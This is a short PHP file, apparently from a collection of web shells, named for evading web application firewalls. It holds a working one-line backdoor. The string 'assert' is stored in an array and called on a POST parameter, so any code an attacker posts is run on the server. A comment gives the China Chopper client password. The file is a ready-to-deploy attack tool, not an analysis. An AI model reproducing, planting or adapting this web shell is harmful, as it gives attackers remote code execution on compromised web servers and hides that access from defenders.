webshell/php/pass-waf-2014-10-19.php
2014-10-20 08:27:05 +08:00

5 lines
No EOL
117 B
PHP

<?php
$item['tt'] = 'assert';
$array[] = $item;
$array[0]['tt']($_POST['tt1234']); //caidao password: tt1234
?>